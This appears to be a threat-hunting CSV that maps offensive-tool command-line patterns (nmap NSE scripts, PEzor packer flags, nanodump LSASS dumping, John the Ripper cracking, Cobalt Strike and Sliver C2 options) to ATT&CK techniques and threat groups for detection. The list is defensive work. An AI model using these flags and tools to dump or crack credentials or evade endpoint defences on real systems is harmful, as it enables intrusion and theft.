-* finger.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* fingerprint-strings.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* firewalk.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* firewall-bypass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* flash.bat*,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* -fluctuate=NA -sleep=*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 -
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z
-* -fluctuate=RW -sleep=*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z
-* flume-master-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* --flush-attacks*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z
-* follina.py *,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/ItsNee/Follina-CVE-2022-30190-POC,1,0,N/A,N/A,1,5,0,2022-07-04T13:27:13Z,2022-06-05T13:54:04Z
-* -force-forwardable,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g.
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-* --force-kerb *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* --force-ps32,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks.
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* forgeTGT(*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -* --fork --write *.dmp*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* --format exe * --jitter *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -* --format kirbi*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* -format=bof *.exe*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -format=bof -cleanup *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -format=dotnet -sleep=*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -format=dotnet-pinvoke *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* --format=krb5asrep* --wordlist=*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 
Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* --format=netntlmv2 *.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --format=NT -w=*_password.txt*,offensive_tool_keyword,JohnTheRipper,John the Ripper is a fast password cracker.,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/magnumripper/JohnTheRipper,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* -format=reflective-dll *.exe*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -format=service-dll *.exe*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -format=service-exe *.exe*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens 
- Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* fox-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* freelancer-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Freeze.rs/*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,1,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -* ftp-anon.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ftp-bounce.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ftp-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ftp-libopie.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ftp-log4shell.nse*,offensive_tool_keyword,nmap,Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Diverto/nse-log4shell,1,0,N/A,N/A,4,347,51,2021-12-20T15:34:21Z,2021-12-12T22:52:02Z -* ftp-proftpd-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* FtpSniffer *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* ftp-syst.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ftp-vsftpd-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ftp-vuln-cve2010-4221.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* FudgeC2 *,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -* -FullPrivs * ,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --functions NtProtectVirtualMemory*NtWriteVirtualMemory -o 